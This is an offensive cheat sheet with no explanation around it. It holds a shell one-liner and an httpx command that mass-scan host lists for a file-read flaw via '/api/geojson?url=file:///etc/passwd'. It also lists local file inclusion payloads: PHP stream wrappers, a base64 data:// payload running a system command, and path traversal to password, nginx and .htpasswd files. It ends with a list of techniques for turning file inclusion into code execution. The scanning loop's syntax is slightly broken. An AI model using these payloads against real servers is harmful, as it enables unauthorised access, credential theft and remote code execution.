cat targets.txt| while read host do;do curl --silent --insecure --path-as-is "$host/api/geojson?url=file:///etc/passwd" | grep -qs "root:x" && echo "$host \033[0;31m Vulnerable";done
httpx -l IPlist.txt -follow-redirects -title -path /api/geojson?url=file:///etc/passwd -match-string "root:x:0:0"

expect://whoami
///path/to/file.ext
=php://filter/resource=/etc/passwd
post
php://input&cmd=ls
../../../proc/self/environ
data://text/plain;base64,JTNDJTNGc3lzdGVtJTI4JTI3aWQlMjclMjklM0IlM0YlM0U=
file=../../../../etc/passwd
file=../../../../etc/nginx/sites-available/default
file=../../../../var/www/p4ss/.htpasswd




LFI TO RCE
1. Apache Log Poisoning
2. SSH Log Poisoning
3. SMTP Log Poisoning
4. Image Upload
5. /proc/self/environ
6. php://filter
7. Zip upload
8. input:// stream
9. /proc/self/fd
